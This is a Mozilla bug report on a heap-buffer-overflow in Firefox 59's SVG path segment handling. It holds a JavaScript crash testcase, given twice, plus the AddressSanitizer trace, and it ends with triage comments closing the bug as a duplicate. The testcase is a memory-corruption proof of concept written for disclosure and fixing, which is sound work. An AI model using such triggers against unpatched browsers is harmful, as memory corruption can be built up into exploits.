Closed
Bug 1430560
Opened 7 years ago
Closed 7 years ago
heap-buffer-overflow in mozilla::DOMSVGPathSeg::RemovingFromList
Categories
(Core :: SVG, defect)
Tracking
RESOLVED
DUPLICATE
of bug 1430557
Tracking | Status |
---|---|
firefox59 | --- affected |
People
(Reporter: nils, Unassigned)
Details
(Keywords: csectype-bounds, reporter-external)
Attachments
(2 files)
The following testcase crashes the latest ASAN build of Firefox 59.0a1 (SourceStamp=21ddfb9e6cc008e47da89db50e22697dc7b38635).
<script>
o399=document.createElementNS('http://www.w3.org/2000/svg','path');
o399.setAttribute('d', 'M 2 -9 M-917504 64 m524288 272629760 A0 3584 4094 0 0 32766 686 Q 1 -11,2 386 h 589824 V 1 H 8192 s 376832 1048569, 29698 33554432 M1020 64 C 1024 -786432, 16 0, 256 0 V 696 A10240 1 11 1 0 -14 983040 V 32 t6 32 V 126 Q 119 648,117 10 C 55 12, -2621443 432, 710 19 A4 600 534 0 1 10 1 Q 1 294,195 1 q 3 1048574,7 4294967295 v -10 H -3 s 31 1835008, 9 5 H 154 h 1 V 32 V 2097152 V 14 Q 531 54,8388608 -10 L-11 -3 M1 -2359302 a1 71 -2147483647 0 0 48234511 1 Q 262134 4,317 0 A14 134144 105 1 1 20 134217743 q 670 1,641 35 t468 4 H -27262976 C 65536 -14, -2147483648 628, 207 -96 q -40960 27,60 -10240 m1 8388608 c 805306368 2058, 114688 4, 243 1 t7864320 7232 M4 -65522 c -3 64, 14 4, 0.00000000001 1 H 7 S 1610612724 -18, 4 1 z');
o782=o399.createSVGPathSegLinetoVerticalRel(4);
o820=o399.animatedPathSegList;
o670=o399.createSVGPathSegLinetoVerticalAbs(15);
o1058=o399.pathSegList;
for(var x=0; x<47; x++) o820[x];
o1058.replaceItem(o782,35);
o1058.insertItemBefore(o670,28);
o1058.clear();
</script>
ASAN output:
=================================================================
==30545==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61800001fb90 at pc 0x0000004bdf99 bp 0x7ffcec556870 sp 0x7ffcec556020
READ of size 16 at 0x61800001fb90 thread T0 (file:// Content)
#0 0x4bdf98 in __asan_memcpy /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3
#1 0x7fdae91fcdad in mozilla::DOMSVGPathSeg::RemovingFromList() /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSeg.cpp:114:3
#2 0x7fdae922bffb in mozilla::DOMSVGPathSegList::InternalListWillChangeTo(mozilla::SVGPathData const&) /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSegList.cpp:205:24
#3 0x7fdae922cca1 in mozilla::DOMSVGPathSegList::Clear(mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/svg/DOMSVGPathSegList.cpp:289:19
#4 0x7fdae6c5d267 in mozilla::dom::SVGPathSegListBinding::clear(JSContext*, JS::Handle<JSObject*>, mozilla::DOMSVGPathSegList*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/SVGPathSegListBinding.cpp:61:9
#5 0x7fdae7d594f7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3036:13
#6 0x7fdaee792d24 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#7 0x7fdaee792d24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
#8 0x7fdaee9e3d07 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2559:14
#9 0x233ad890252a (<unknown module>)
0x61800001fb90 is located 0 bytes to the right of 784-byte region [0x61800001f880,0x61800001fb90)
allocated by thread T0 (file:// Content) here:
#0 0x4bed33 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
#1 0x7fdae2b623c8 in Malloc /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:196:46
#2 0x7fdae2b623c8 in nsTArrayFallibleAllocator::ResultTypeProxy nsTArray_base<nsTArrayFallibleAllocator, nsTArray_CopyWithMemutils>::EnsureCapacity<nsTArrayFallibleAllocator>(unsigned long, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:136
#3 0x7fdae718b2c7 in float* nsTArray_Impl<float, nsTArrayFallibleAllocator>::ReplaceElementsAt<float, nsTArrayFallibleAllocator>(unsigned long, unsigned long, float const*, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2025:47
#4 0x7fdae92c0c43 in Assign<nsTArrayFallibleAllocator, nsTArrayFallibleAllocator> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1252:9
#5 0x7fdae92c0c43 in Assign<nsTArrayFallibleAllocator> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1261
#6 0x7fdae92c0c43 in mozilla::SVGPathData::CopyFrom(mozilla::SVGPathData const&) /builds/worker/workspace/build/src/dom/svg/SVGPathData.cpp:37
#7 0x7fdae925d9ed in mozilla::SVGAnimatedPathSegList::SetBaseValueString(nsTSubstring<char16_t> const&) /builds/worker/workspace/build/src/dom/svg/SVGAnimatedPathSegList.cpp:57:27
#8 0x7fdae932b296 in nsSVGElement::ParseAttribute(int, nsAtom*, nsTSubstring<char16_t> const&, nsIPrincipal*, nsAttrValue&) /builds/worker/workspace/build/src/dom/svg/nsSVGElement.cpp:422:20
#9 0x7fdae5b3755c in mozilla::dom::Element::SetAttr(int, nsAtom*, nsAtom*, nsTSubstring<char16_t> const&, nsIPrincipal*, bool) /builds/worker/workspace/build/src/dom/base/Element.cpp:2608:8
#10 0x7fdae5b36950 in SetAttr /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:894:12
#11 0x7fdae5b36950 in mozilla::dom::Element::SetAttribute(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsIPrincipal*, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/Element.cpp:1348
#12 0x7fdae777ac88 in mozilla::dom::ElementBinding::setAttribute(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:1167:9
#13 0x7fdae7d594f7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3036:13
#14 0x7fdaee792d24 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#15 0x7fdaee792d24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
#16 0x7fdaee77dd56 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
#17 0x7fdaee77dd56 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
#18 0x7fdaee764700 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
#19 0x7fdaee795cc1 in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:706:15
#20 0x7fdaee79645f in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:738:12
#21 0x7fdaef28f1e6 in ExecuteScript(JSContext*, JS::AutoObjectVector&, JS::Handle<JSScript*>, JS::Value*) /builds/worker/workspace/build/src/js/src/jsapi.cpp:4712:12
#22 0x7fdae5e77846 in nsJSUtils::ExecutionContext::CompileAndExec(JS::CompileOptions&, JS::SourceBufferHolder&, JS::MutableHandle<JSScript*>) /builds/worker/workspace/build/src/dom/base/nsJSUtils.cpp:266:8
#23 0x7fdae9c7caad in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:2268:25
#24 0x7fdae9c76d39 in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1911:10
#25 0x7fdae9c740a3 in mozilla::dom::ScriptLoader::ProcessInlineScript(nsIScriptElement*, mozilla::dom::ScriptKind) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1555:10
#26 0x7fdae9c589fe in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1293:10
#27 0x7fdae9c57b19 in mozilla::dom::ScriptElement::MaybeProcessScript() /builds/worker/workspace/build/src/dom/script/ScriptElement.cpp:147:18
#28 0x7fdae4c9a84b in AttemptToExecute /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIScriptElement.h:246:18
#29 0x7fdae4c9a84b in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:736
#30 0x7fdae4c93ab4 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:540:7
#31 0x7fdae4ca013b in nsHtml5ExecutorFlusher::Run() /builds/worker/workspace/build/src/parser/html/nsHtml5StreamParser.cpp:131:20
#32 0x7fdae2bce710 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:395:25
#33 0x7fdae2bf670d in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
#34 0x7fdae2c114e0 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
#35 0x7fdae3a9c63a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#36 0x7fdae39f3f29 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#37 0x7fdae39f3f29 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#38 0x7fdae39f3f29 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23:3 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c307fffbf20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffbf30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffbf40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffbf50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffbf60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c307fffbf70: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c307fffbf80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c307fffbf90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffbfa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffbfb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffbfc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==30545==ABORTING
Comment 2•7 years ago
Jonathan, is this something you could investigate? Thanks.
Comment 3•7 years ago
This is the same underlying problem as bug 1430557. See bug 1430557 comment 3.
Status: NEW → RESOLVED
Closed: 7 years ago
Flags: needinfo?(jwatt)
Resolution: --- → DUPLICATE
Comment 4•7 years ago
For posterity, here's the testcase from this bug with meaningful variable names:
<script>
path = document.createElementNS("http://www.w3.org/2000/svg", "path");
path.setAttribute("d", "M 2 -9 M-917504 64 m524288 272629760 A0 3584 4094 0 0 32766 686 Q 1 -11,2 386 h 589824 V 1 H 8192 s 376832 1048569, 29698 33554432 M1020 64 C 1024 -786432, 16 0, 256 0 V 696 A10240 1 11 1 0 -14 983040 V 32 t6 32 V 126 Q 119 648,117 10 C 55 12, -2621443 432, 710 19 A4 600 534 0 1 10 1 Q 1 294,195 1 q 3 1048574,7 4294967295 v -10 H -3 s 31 1835008, 9 5 H 154 h 1 V 32 V 2097152 V 14 Q 531 54,8388608 -10 L-11 -3 M1 -2359302 a1 71 -2147483647 0 0 48234511 1 Q 262134 4,317 0 A14 134144 105 1 1 20 134217743 q 670 1,641 35 t468 4 H -27262976 C 65536 -14, -2147483648 628, 207 -96 q -40960 27,60 -10240 m1 8388608 c 805306368 2058, 114688 4, 243 1 t7864320 7232 M4 -65522 c -3 64, 14 4, 0.00000000001 1 H 7 S 1610612724 -18, 4 1 z");
baseList = path.pathSegList;
animList = path.animatedPathSegList;
line1 = path.createSVGPathSegLinetoVerticalRel(4);
line2 = path.createSVGPathSegLinetoVerticalAbs(15);
for(var x=0; x<47; x++) {
animList[x];
}
baseList.replaceItem(line1, 35);
baseList.insertItemBefore(line2, 28);
baseList.clear();
</script>
Updated•7 years ago
Flags: sec-bounty?
Comment 5•7 years ago
Minusing for a bounty since it is the same underlying issue as bug 1430557.
Flags: sec-bounty? → sec-bounty-
Updated•4 years ago
Group: layout-core-security
Updated•9 months ago
Keywords: reporter-external